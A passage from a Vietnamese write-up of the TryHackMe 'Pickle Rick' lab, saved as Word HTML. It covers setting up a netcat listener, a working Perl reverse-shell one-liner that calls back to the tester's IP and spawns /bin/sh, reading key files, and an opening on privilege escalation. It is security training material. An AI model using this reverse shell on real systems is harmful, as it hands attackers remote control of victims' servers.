style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
|
||
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
|
||
major-latin;mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_18"
|
||
o:spid="_x0000_i1042" type="#_x0000_t75" alt="Graphical user interface, text, application, chat or text message Description automatically generated"
|
||
style='width:151.2pt;height:147pt;visibility:visible;mso-wrap-style:square'>
|
||
<v:imagedata src="Khai%20thác%20Pickle%20Rick%20_files/image027.png" o:title="Graphical user interface, text, application, chat or text message Description automatically generated"/>
|
||
</v:shape><![endif]--><![if !vml]><img border=0 width=202 height=196
|
||
src="Khai%20thác%20Pickle%20Rick%20_files/image028.png"
|
||
alt="Graphical user interface, text, application, chat or text message Description automatically generated"
|
||
v:shapes="Picture_x0020_18"><![endif]></span><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin;
|
||
color:red'>TIP QUAN TRỌNG:<o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Thông
|
||
thường, chúng ta có thể sử dụng trình điều
|
||
khiển này để pentest tiếp, nhưng lúc này lại
|
||
có một vấn đề như thế này. Để có
|
||
thể truy cập vào được trình điều khiển
|
||
server bằng dòng lệnh này, chúng ta cần phải
|
||
đăng nhập thành công vào admin dashboard, vậy điều
|
||
gì sẽ xảy ra nếu như password và username bị thay
|
||
đổi? Khả năng cao là chúng ta sẽ không thể
|
||
truy cập vào trình điều khiển này được nữa
|
||
và phải tìm một lỗi khai thác khác.<o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Để
|
||
tránh trường hợp trên xảy ra, chúng ta sẽ thiết
|
||
lập một TCP reverse shell. Hay có thể giải thích
|
||
đơn giản rằng chúng ta sẽ thiết lập một
|
||
kết nối TCP từ máy nạn nhân đến máy của
|
||
pentester và chúng ta sẽ điều khiển máy nạn nhân
|
||
thông qua kết nối TCP đó. Như vậy, chúng ta không cần
|
||
phải lo lắng chuyện mất quyền truy cập vào
|
||
trình điểu khiển nữa.<o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Kiểm
|
||
tra trên server có đang chạy bash, perl, python, ruby gì không?<o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal align=center style='text-align:center'><span
|
||
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
|
||
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
|
||
major-latin;mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_19"
|
||
o:spid="_x0000_i1041" type="#_x0000_t75" alt="Graphical user interface, text, application, email Description automatically generated"
|
||
style='width:258pt;height:163.2pt;visibility:visible;mso-wrap-style:square'>
|
||
<v:imagedata src="Khai%20thác%20Pickle%20Rick%20_files/image029.png" o:title="Graphical user interface, text, application, email Description automatically generated"/>
|
||
</v:shape><![endif]--><![if !vml]><img border=0 width=344 height=218
|
||
src="Khai%20thác%20Pickle%20Rick%20_files/image030.png"
|
||
alt="Graphical user interface, text, application, email Description automatically generated"
|
||
v:shapes="Picture_x0020_19"><![endif]></span><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Chúng
|
||
ta đã xác định được server có chạy những
|
||
loại nào, tiếp theo sẽ tạo một Reverse shell bằng
|
||
những câu lệnh như </span><a
|
||
href="https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet"><span
|
||
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
|
||
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
|
||
major-latin'>link sau.</span></a>( Hoặc <a
|
||
href="https://drive.google.com/file/d/1gtRmYwFHalXu_DVPrRiod9LPNF2EiHVX/view">link
|
||
này</a>).<u><span style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
|
||
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
|
||
major-latin;color:#0563C1;mso-themecolor:hyperlink'><o:p></o:p></span></u></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Trước
|
||
đó cần phải xác định IP mà máy pentester đã
|
||
dùng VPN tới, đồng thời là một port để
|
||
nhận tín hiệu gửi về. Phần IP thì có sẳn,
|
||
kiểm tra xem một port nào đó có đang được
|
||
mở dùng trên máy dùng câu lệnh nmap, telnet, cat /etc/services.<o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Chúng
|
||
ta sẽ mượn port 8888 để nhận kết nối
|
||
chỏ về từ máy server. Cách mở port trên máy kali: nc
|
||
-nlvp 8888<o:p></o:p></span></p>
|
||
|
||
<p class=MsoListParagraphCxSpFirst style='text-align:justify;text-indent:-.25in;
|
||
mso-list:l5 level1 lfo2'><![if !supportLists]><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:Symbol;mso-fareast-font-family:Symbol;mso-bidi-font-family:
|
||
Symbol'><span style='mso-list:Ignore'>·<span style='font:7.0pt "Times New Roman"'>
|
||
</span></span></span><![endif]><span style='font-size:13.0pt;line-height:107%;
|
||
font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:major-latin;
|
||
mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>n: Mang ý
|
||
nghĩa chúng ta sẽ chỉ dùng IPv4 address, không dùng domain<o:p></o:p></span></p>
|
||
|
||
<p class=MsoListParagraphCxSpMiddle style='text-align:justify;text-indent:-.25in;
|
||
mso-list:l5 level1 lfo2'><![if !supportLists]><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:Symbol;mso-fareast-font-family:Symbol;mso-bidi-font-family:
|
||
Symbol'><span style='mso-list:Ignore'>·<span style='font:7.0pt "Times New Roman"'>
|
||
</span></span></span><![endif]><span style='font-size:13.0pt;line-height:107%;
|
||
font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:major-latin;
|
||
mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>-l: Chế
|
||
độ lắng nghe<o:p></o:p></span></p>
|
||
|
||
<p class=MsoListParagraphCxSpMiddle style='text-align:justify;text-indent:-.25in;
|
||
mso-list:l5 level1 lfo2'><![if !supportLists]><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:Symbol;mso-fareast-font-family:Symbol;mso-bidi-font-family:
|
||
Symbol'><span style='mso-list:Ignore'>·<span style='font:7.0pt "Times New Roman"'>
|
||
</span></span></span><![endif]><span style='font-size:13.0pt;line-height:107%;
|
||
font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:major-latin;
|
||
mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>-v: Verbose –
|
||
Cho biết quá trình lắng nghe đang diễn ra thế nào<o:p></o:p></span></p>
|
||
|
||
<p class=MsoListParagraphCxSpLast style='text-align:justify;text-indent:-.25in;
|
||
mso-list:l5 level1 lfo2'><![if !supportLists]><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:Symbol;mso-fareast-font-family:Symbol;mso-bidi-font-family:
|
||
Symbol'><span style='mso-list:Ignore'>·<span style='font:7.0pt "Times New Roman"'>
|
||
</span></span></span><![endif]><span style='font-size:13.0pt;line-height:107%;
|
||
font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:major-latin;
|
||
mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>-p: Chỉ
|
||
định port để lắng nghe<o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Tiếp
|
||
theo sử dụng những câu lệnh để excute từ
|
||
trên server, trong trường hợp này là:<o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal><span style='font-size:13.0pt;line-height:107%;font-family:
|
||
"Calibri Light",sans-serif;mso-ascii-theme-font:major-latin;mso-hansi-theme-font:
|
||
major-latin;mso-bidi-theme-font:major-latin'>perl -e 'use Socket;$i="<span
|
||
style='color:red'>10.4.43.108</span>";$p=<span style='color:red'>8888</span>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh
|
||
-i");};'<o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal><span style='font-size:13.0pt;line-height:107%;font-family:
|
||
"Calibri Light",sans-serif;mso-ascii-theme-font:major-latin;mso-hansi-theme-font:
|
||
major-latin;mso-bidi-theme-font:major-latin;background:yellow;mso-highlight:
|
||
yellow'>CHÚ Ý: lúc làm lab tới đây thì tắt đi nghỉ,
|
||
nên địa chỉ server của tryhackmy sẽ thay đổi
|
||
khi bật lên làm tiếp:<o:p></o:p></span></p>
|
||
|
||
<p class=MsoListParagraphCxSpFirst style='margin-left:2.25in;mso-add-space:
|
||
auto;text-indent:-.25in;mso-list:l1 level1 lfo3'><![if !supportLists]><span
|
||
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
|
||
mso-fareast-font-family:"Calibri Light";background:yellow;mso-highlight:yellow'><span
|
||
style='mso-list:Ignore'>-<span style='font:7.0pt "Times New Roman"'>
|
||
</span></span></span><![endif]><span style='font-size:13.0pt;line-height:107%;
|
||
font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:major-latin;
|
||
mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin;background:
|
||
yellow;mso-highlight:yellow'>IP server: 10.10.105.178<o:p></o:p></span></p>
|
||
|
||
<p class=MsoListParagraphCxSpLast style='margin-left:2.25in;mso-add-space:auto;
|
||
text-indent:-.25in;mso-list:l1 level1 lfo3'><![if !supportLists]><span
|
||
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
|
||
mso-fareast-font-family:"Calibri Light";background:yellow;mso-highlight:yellow'><span
|
||
style='mso-list:Ignore'>-<span style='font:7.0pt "Times New Roman"'>
|
||
</span></span></span><![endif]><span style='font-size:13.0pt;line-height:107%;
|
||
font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:major-latin;
|
||
mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin;background:
|
||
yellow;mso-highlight:yellow'>IP của máy kali: 10.4.43.108<o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal><span style='font-size:13.0pt;line-height:107%;font-family:
|
||
"Calibri Light",sans-serif;mso-ascii-theme-font:major-latin;mso-hansi-theme-font:
|
||
major-latin;mso-bidi-theme-font:major-latin'>Sau khi excute câu lệnh trên
|
||
web cùng với thực hiện lắng nghe trên máy kali, kết
|
||
quả nhận được:<o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal align=center style='text-align:center'><span
|
||
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
|
||
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
|
||
major-latin;mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_2"
|
||
o:spid="_x0000_i1040" type="#_x0000_t75" alt="Text Description automatically generated"
|
||
style='width:325.8pt;height:89.4pt;visibility:visible;mso-wrap-style:square'>
|
||
<v:imagedata src="Khai%20thác%20Pickle%20Rick%20_files/image031.png" o:title="Text Description automatically generated"/>
|
||
</v:shape><![endif]--><![if !vml]><img border=0 width=434 height=119
|
||
src="Khai%20thác%20Pickle%20Rick%20_files/image032.png"
|
||
alt="Text Description automatically generated" v:shapes="Picture_x0020_2"><![endif]></span><span
|
||
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
|
||
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
|
||
major-latin'><o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin;
|
||
background:lime;mso-highlight:lime'>Tìm key thứ nhất:</span><span
|
||
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
|
||
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
|
||
major-latin'><o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Sau
|
||
khi có kết nối rồi, dùng lệnh kiểm tra các tập
|
||
tin/ thư mục đang hiện hành nên dùng lệnh “ls -la”<o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal align=center style='text-align:center'><span
|
||
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
|
||
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
|
||
major-latin;mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_10"
|
||
o:spid="_x0000_i1039" type="#_x0000_t75" alt="Text Description automatically generated with medium confidence"
|
||
style='width:372.6pt;height:129pt;visibility:visible;mso-wrap-style:square'>
|
||
<v:imagedata src="Khai%20thác%20Pickle%20Rick%20_files/image033.png" o:title="Text Description automatically generated with medium confidence"/>
|
||
</v:shape><![endif]--><![if !vml]><img border=0 width=497 height=172
|
||
src="Khai%20thác%20Pickle%20Rick%20_files/image034.png"
|
||
alt="Text Description automatically generated with medium confidence"
|
||
v:shapes="Picture_x0020_10"><![endif]></span><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Có
|
||
một file dạng txt khả nghi, đọc file đó =>
|
||
key1: mr. meeseek hair<o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin;
|
||
background:lime;mso-highlight:lime'>Tìm key thứ 2</span><span
|
||
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
|
||
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
|
||
major-latin'><o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Đầu
|
||
tiên di chuyển ra thư mục root và liệt kê ra các
|
||
file/dir hiện hành:<o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin;
|
||
mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_11" o:spid="_x0000_i1038"
|
||
type="#_x0000_t75" alt="Text Description automatically generated"
|
||
style='width:468pt;height:277.8pt;visibility:visible;mso-wrap-style:square'>
|
||
<v:imagedata src="Khai%20thác%20Pickle%20Rick%20_files/image035.png" o:title="Text Description automatically generated"/>
|
||
</v:shape><![endif]--><![if !vml]><img border=0 width=624 height=370
|
||
src="Khai%20thác%20Pickle%20Rick%20_files/image036.png"
|
||
alt="Text Description automatically generated" v:shapes="Picture_x0020_11"><![endif]></span><span
|
||
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
|
||
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
|
||
major-latin'><o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><b><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Kiến
|
||
thức thu lụm được:<o:p></o:p></span></b></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Ở
|
||
thời điểm này, chỉ cần chú ý đến 3
|
||
directories đó là<o:p></o:p></span></p>
|
||
|
||
<p class=MsoListParagraphCxSpFirst style='text-align:justify;text-indent:-.25in;
|
||
mso-list:l7 level1 lfo4'><![if !supportLists]><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:Symbol;mso-fareast-font-family:Symbol;mso-bidi-font-family:
|
||
Symbol'><span style='mso-list:Ignore'>·<span style='font:7.0pt "Times New Roman"'>
|
||
</span></span></span><![endif]><span style='font-size:13.0pt;line-height:107%;
|
||
font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:major-latin;
|
||
mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>home:
|
||
Nơi chứa những directories của những người
|
||
dùng thông thường. Những người dùng thông thường
|
||
sẽ được phép truy cập vào directory home này,
|
||
nhưng không được phép thay đổi những
|
||
directories (ví dụ như thêm hoặc xóa) được chứa
|
||
bên trong directory home.<o:p></o:p></span></p>
|
||
|
||
<p class=MsoListParagraphCxSpMiddle style='text-align:justify;text-indent:-.25in;
|
||
mso-list:l7 level1 lfo4'><![if !supportLists]><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:Symbol;mso-fareast-font-family:Symbol;mso-bidi-font-family:
|
||
Symbol'><span style='mso-list:Ignore'>·<span style='font:7.0pt "Times New Roman"'>
|
||
</span></span></span><![endif]><span style='font-size:13.0pt;line-height:107%;
|
||
font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:major-latin;
|
||
mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>root:
|
||
Directory của root hay admin, người có quyền quản
|
||
trị cao nhất và chỉ có root/admin mới được
|
||
quyền truy cập vào đây.<o:p></o:p></span></p>
|
||
|
||
<p class=MsoListParagraphCxSpLast style='text-align:justify;text-indent:-.25in;
|
||
mso-list:l7 level1 lfo4'><![if !supportLists]><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:Symbol;mso-fareast-font-family:Symbol;mso-bidi-font-family:
|
||
Symbol'><span style='mso-list:Ignore'>·<span style='font:7.0pt "Times New Roman"'>
|
||
</span></span></span><![endif]><span style='font-size:13.0pt;line-height:107%;
|
||
font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:major-latin;
|
||
mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>tmp: đây
|
||
là directory thường được dùng để lưu
|
||
trữ những dữ liệu tạm thời, và được
|
||
cấp quyền truy cập, sửa đổi và thực
|
||
thi cho tất cả người dùng hệ thống (cả
|
||
root lẫn người dùng thường). Vì lẽ, directory
|
||
này rất hay bị lợi dụng làm nơi chuyển dữ
|
||
liệu hoặc mã độc giữa máy hacker và máy nạn
|
||
nhân. Cũng như hacker có thể chạy file mã độc
|
||
ngay tại directory tmp để tấn công hệ thống.<o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Di
|
||
chuyển vào thư mục home, liệt kê các user:<o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal align=center style='text-align:center'><span
|
||
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
|
||
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
|
||
major-latin;mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_20"
|
||
o:spid="_x0000_i1037" type="#_x0000_t75" style='width:385.8pt;height:108.6pt;
|
||
visibility:visible;mso-wrap-style:square'>
|
||
<v:imagedata src="Khai%20thác%20Pickle%20Rick%20_files/image037.png" o:title=""/>
|
||
</v:shape><![endif]--><![if !vml]><img border=0 width=514 height=145
|
||
src="Khai%20thác%20Pickle%20Rick%20_files/image037.png" v:shapes="Picture_x0020_20"><![endif]></span><span
|
||
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
|
||
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
|
||
major-latin'><o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Kết
|
||
quả trả về là có 2 người dùng bình thường
|
||
là rick và ubuntu, và chúng ta có quyền truy cập vào cả 2
|
||
directories này. Thế tại sao account www-data lại không có ở
|
||
đây? Vì account www-data là account mặc định được
|
||
hệ thống webserver (ví dụ như Apache hoặc Nginx,
|
||
v.v.) sử dụng cho các tác vụ thường ngày. Đây
|
||
là một account bình thường và không có quyền hạn
|
||
gì đặc biệt.<o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Vào
|
||
trong user rick để tìm key thứ 2<o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal align=center style='text-align:center'><span
|
||
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
|
||
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
|
||
major-latin;mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_21"
|
||
o:spid="_x0000_i1036" type="#_x0000_t75" alt="Text Description automatically generated"
|
||
style='width:349.2pt;height:100.2pt;visibility:visible;mso-wrap-style:square'>
|
||
<v:imagedata src="Khai%20thác%20Pickle%20Rick%20_files/image038.png" o:title="Text Description automatically generated"/>
|
||
</v:shape><![endif]--><![if !vml]><img border=0 width=466 height=134
|
||
src="Khai%20thác%20Pickle%20Rick%20_files/image039.png"
|
||
alt="Text Description automatically generated" v:shapes="Picture_x0020_21"><![endif]></span><span
|
||
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
|
||
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
|
||
major-latin'><o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin;
|
||
background:lime;mso-highlight:lime'>Tìm key thứ 3</span><span
|
||
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
|
||
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
|
||
major-latin'><o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Lúc
|
||
này chuyển qua user còn lại trong thư mục home để
|
||
tìm. Ở đây chúng ta có 2 file để chú ý là
|
||
.sudo_as_admin_successful và .ssh. Nhưng .sudo_as_admin_successful có số
|
||
byte dữ liệu bằng 0 nên đây là một file trống.
|
||
Còn directory .ssh không cho chúng ta quyền truy cập. Có thể
|
||
thử cd đến .ssh sẽ nhận được báo lỗi
|
||
sau<o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal align=center style='text-align:center'><span
|
||
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
|
||
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
|
||
major-latin;mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_22"
|
||
o:spid="_x0000_i1035" type="#_x0000_t75" alt="Text Description automatically generated"
|
||
style='width:382.2pt;height:176.4pt;visibility:visible;mso-wrap-style:square'>
|
||
<v:imagedata src="Khai%20thác%20Pickle%20Rick%20_files/image040.png" o:title="Text Description automatically generated"/>
|
||
</v:shape><![endif]--><![if !vml]><img border=0 width=510 height=235
|
||
src="Khai%20thác%20Pickle%20Rick%20_files/image041.png"
|
||
alt="Text Description automatically generated" v:shapes="Picture_x0020_22"><![endif]></span><span
|
||
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
|
||
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
|
||
major-latin'><o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Do
|
||
đó cần phải leo thang đặc quyền để
|
||
có thể truy cập được trong dir này. Privileges
|
||
escalation là một lĩnh vực khá rộng và có vô số
|
||
cách cũng như kỹ thuật để thực hiện.
|
||
Trong đó có 2 cách phổ biến nhất đó là sử dụng:<o:p></o:p></span></p>
|
||
|
||
<p class=MsoListParagraphCxSpFirst style='text-align:justify;text-indent:-.25in;
|
||
mso-list:l2 level1 lfo5'><![if !supportLists]><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:Symbol;mso-fareast-font-family:Symbol;mso-bidi-font-family:
|
||
Symbol'><span style='mso-list:Ignore'>·<span style='font:7.0pt "Times New Roman"'>
|
||
</span></span></span><![endif]><span style='font-size:13.0pt;line-height:107%;
|
||
font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:major-latin;
|
||
mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Kernal
|
||
exploit: Nghĩa là lợi dụng những lỗ hổng bảo
|
||
mật nằm trong nhân Linux hoặc hệ điều hành
|
||
Ubuntu để tiến hành nâng quyền quản trị.<o:p></o:p></span></p>
|
||
|
||
<p class=MsoListParagraphCxSpLast style='text-align:justify;text-indent:-.25in;
|
||
mso-list:l2 level1 lfo5'><![if !supportLists]><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:Symbol;mso-fareast-font-family:Symbol;mso-bidi-font-family:
|
||
Symbol'><span style='mso-list:Ignore'>·<span style='font:7.0pt "Times New Roman"'>
|
||
</span></span></span><![endif]><span style='font-size:13.0pt;line-height:107%;
|
||
font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:major-latin;
|
||
mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Sudo rights:
|
||
Lợi dụng các công cụ được cấp quyền
|
||
sử dụng để nâng quyền quản trị.<o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
